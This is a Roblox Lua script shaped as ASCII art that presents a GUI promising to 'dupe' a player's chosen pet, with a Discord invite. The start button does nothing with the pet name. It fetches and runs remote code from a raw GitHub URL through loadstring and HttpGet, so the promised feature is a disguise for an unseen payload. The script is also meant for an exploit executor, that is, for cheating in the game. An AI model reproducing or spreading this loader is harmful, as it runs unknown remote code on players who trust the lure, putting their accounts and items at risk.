                                                                                 local ScreenGui=      
                                                                        Instance.new("ScreenGui");local Frame=Instance. 
                                                                    new("Frame");local name=Instance.new("TextLabel");local       
                                                                STARTDUPE=Instance.new("ImageButton");local Insturktion=Instance.new(   
                                                            "TextLabel");local StartHuge=Instance.new("ImageLabel");local arrow=Instance. 
                                                          new("ImageLabel");local Huge1=Instance.new("ImageLabel");local Huge2=Instance.new 
                                                        ("ImageLabel");local NameHuge=Instance.new("TextBox");local info=Instance.new(        
                                                      "TextLabel");local discord=Instance.new("TextLabel");ScreenGui.Parent=game.CoreGui;       
                                                    ScreenGui.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;Frame.Parent=ScreenGui;Frame.            
                                                  BackgroundColor3=Color3.fromRGB(108,108,108);Frame.BorderColor3=Color3.fromRGB(0,0,0);Frame.      
                                                  BorderSizePixel=0;Frame.Position=UDim2.new(0.302752286,0,0.255128205,0);Frame.Size=UDim2.new(0,496, 
                                                0,291);Frame.Active=true;Frame.Draggable=true;name.Name="name";name.Parent=Frame;name.BackgroundColor3= 
                                                Color3.fromRGB(255,255,255);name.BackgroundTransparency=1;name.BorderColor3=Color3.fromRGB(255,255,255);  
                                              name.BorderSizePixel=0;name.Position=UDim2.new(0.167338714,0, -0.0549828187,0);name.Size=UDim2.new(0,329,0,79 
                                              );name.Font=Enum.Font.SourceSansBold;name.Text="DEVLUA SCRIPT - DUPE";name.TextColor3=Color3.fromRGB(255,255, 
                                            255);name.TextScaled=true;name.TextSize=14;name.TextStrokeTransparency=0;name.TextWrapped=true;STARTDUPE.Name=    
                                            "STARTDUPE";STARTDUPE.Parent=Frame;STARTDUPE.BackgroundColor3=Color3.fromRGB(255,255,255);STARTDUPE.BorderColor3=   
                                          Color3.fromRGB(0,0,0);STARTDUPE.BorderSizePixel=0;STARTDUPE.Position=UDim2.new(0.110887095,0,0.340206176,0);STARTDUPE.  
                                          Size=UDim2.new(0,138,0,138);STARTDUPE.Image="http://www.roblox.com/asset/?id=8839731548";STARTDUPE.MouseButton1Down:      
                                          connect(function()loadstring(game:HttpGet("https://raw.githubusercontent.com/DevRlchksStudio/Test/main/test"))();end);      
                                          Insturktion.Name="Insturktion";Insturktion.Parent=Frame;Insturktion.BackgroundColor3=Color3.fromRGB(255,255,255);           
                                        Insturktion.BackgroundTransparency=1;Insturktion.BorderColor3=Color3.fromRGB(0,0,0);Insturktion.BorderSizePixel=0;Insturktion.  
                                        Position=UDim2.new(0,0,0.814432979,0);Insturktion.Size=UDim2.new(0,   --[[==============================]]248,0,50);Insturktion.  
                                        Font=Enum.Font.SourceSansBold;Insturktion.Text=             --[[============================================]]                    
                                        "(BUTTON START DUPE)";Insturktion.TextColor3=Color3.    --[[======================================================]]fromRGB(255,255 
                                      ,255);Insturktion.TextScaled=true;Insturktion.        --[[==========================================================]]TextSize=14;      
                                      Insturktion.TextStrokeTransparency=0;Insturktion.   --[[==============================================================]]TextWrapped=    
                                      true;StartHuge.Name="StartHuge";StartHuge.Parent=   --[[================================================================]]Frame;StartHuge 
                                      .BackgroundColor3=Color3.fromRGB(255,255,255);      --[[==================================================================]]StartHuge.    
                                      BorderColor3=Color3.fromRGB(0,0,0);StartHuge.       --[[==================================================================]]BorderSizePixel   
                                    =0;StartHuge.Position=UDim2.new(0.479838699,0,        --[[====================================================================]]0.371134013,0 
                    );StartHuge.Size=UDim2.new(0,75,0,75);StartHuge.Image=                --[[====================================================================]]                
              "http://www.roblox.com/asset/?id=14232536659";arrow.Name="arrow";arrow.     --[[======================================================================]]Parent=Frame; 
            arrow.BackgroundColor3=Color3.fromRGB(255,255,255);arrow.                     --[[======================================================================]]              
          BackgroundTransparency=1;arrow.BorderColor3=Color3.fromRGB(0,0,0);arrow.        --[[======================================================================]]              
        BorderSizePixel=0;arrow.Position=UDim2.new(0.663306475,0,0.391752571,0);arrow.    --[[======================================================================]]Size=UDim2.   
        new(0,62,0,62);arrow.Image="http://www.roblox.com/asset/?id=153287088";Huge1.Name --[[======================================================================]]="Huge1";     
      Huge1.Parent=Frame;Huge1.BackgroundColor3=Color3.fromRGB(255,255,255);Huge1.        --[[======================================================================]]BorderColor3= 
      Color3.fromRGB(0,0,0);Huge1.BorderSizePixel=0;Huge1.Position=UDim2.new(0.814516127,0, --[[==================================================================]]0.216494843,0); 
      Huge1.Size=UDim2.new(0,69,0,69);Huge1.Image=                                          --[[================================================================]]                  
    "http://www.roblox.com/asset/?id=14232536659";Huge2.Name="Huge2";Huge2.Parent=Frame;    --[[==============================================================]]Huge2.            
    BackgroundColor3=Color3.fromRGB(255,255,255);Huge2.BorderColor3=Color3.fromRGB(0,0,0);    --[[==========================================================]]Huge2.              
    BorderSizePixel=0;Huge2.Position=UDim2.new(0.8125,0,0.53264606,0);Huge2.Size=UDim2.new(0,70 --[[====================================================]],0,69);Huge2.Image=     
    "http://www.roblox.com/asset/?id=14232536659";NameHuge.Name="NameHuge";NameHuge.Parent=Frame; --[[==============================================]]NameHuge.BackgroundColor3 
    =Color3.fromRGB(54,54,54);NameHuge.BorderColor3=Color3.fromRGB(0,0,0);NameHuge.BorderSizePixel=0; --[[====================================]]NameHuge.Position=UDim2.new(  
    0.133064523,0,0.216494843,0);NameHuge.Size=UDim2.new(0,116,0,29);NameHuge.Font=Enum.Font.             --[[========================]]SourceSansBold;NameHuge.Text="";      
    NameHuge.TextColor3=Color3.fromRGB(255,255,255);NameHuge.TextScaled=true;NameHuge.TextSize=14;NameHuge.TextStrokeTransparency=0;NameHuge.TextWrapped=true;info.Name=    
  "info";info.Parent=Frame;info.BackgroundColor3=Color3.fromRGB(255,255,255);info.BackgroundTransparency=1;info.BorderColor3=Color3.fromRGB(0,0,0);info.BorderSizePixel=0 
  ;info.Position=UDim2.new(0,14,0,36);info.Size=UDim2.new(0,234,0,33);info.Font=Enum.Font.SourceSansBold;info.Text="(Type here name pet you want dupe)";info.TextColor3 
  =Color3.fromRGB(255,255,255);info.TextScaled=true;info.TextSize=14;info.TextStrokeTransparency=0;info.TextWrapped=true;discord.Name="discord";discord.Parent=Frame;     
  discord.BackgroundColor3=Color3.fromRGB(255,255,255);discord.BackgroundTransparency=1;discord.BorderColor3=Color3.fromRGB(0,0,0);discord.BorderSizePixel=0;discord.     
  Position=UDim2.new(0,242,0,228);discord.Size=UDim2.new(0,254,0,67);discord.Font=Enum.Font.SourceSans;discord.Text="https://discord.com/invite/DggjezPMy5";discord.      
  TextColor3=Color3.fromRGB(255,255,255);discord.TextScaled=true;discord.TextSize=14;discord.TextStrokeTransparency=0;discord.TextWrapped=true;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   
--------------------------------------------------------------------------------
